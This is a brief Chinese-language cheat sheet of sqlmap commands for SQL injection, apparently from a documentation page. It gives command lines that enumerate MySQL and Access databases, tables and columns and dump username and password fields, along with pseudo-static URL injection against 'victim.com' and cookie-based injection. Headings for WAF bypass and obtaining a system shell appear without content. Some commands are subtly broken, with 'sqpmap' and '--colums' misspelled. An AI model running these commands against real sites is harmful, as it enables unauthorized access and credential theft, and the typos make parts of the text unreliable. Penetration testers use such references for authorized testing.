sqlmap
MySQL数据库注入
sqlmap -u url --dbs #获取数据库
sqlmap -u url -D 指定的数据库 --tables #获取数据库中的表
sqlmap -u url -D 指定的数据库 -T 表名 --columns #获取表字段
sqlmap -u url -D 指定的数据库 -T 表名 -C id,user,pass --dump #获取字段内容Access注入
sqlmap -u 注入点url #判断是否有注入
sqlmap -u 注入点url --tables #access直接猜表
sqlmap -u 注入点url --colums -T admin #爆出admin表,猜解它的字段
sqlmap -u 注入点url --dump -T admin -C "username,password" #猜字段内容伪静态注入
sqpmap -u http://victim.com/id/666*.html --dbs #在html扩展名前加个'*'Cookie注入
sqlmap -u url --cookie="cookie值" --dbs #(或) --tables --level 2POST表单注入
请求延时
绕过WAF防火墙
file参数使用
获取系统交互shell
参数解释
Last updated
Was this helpful?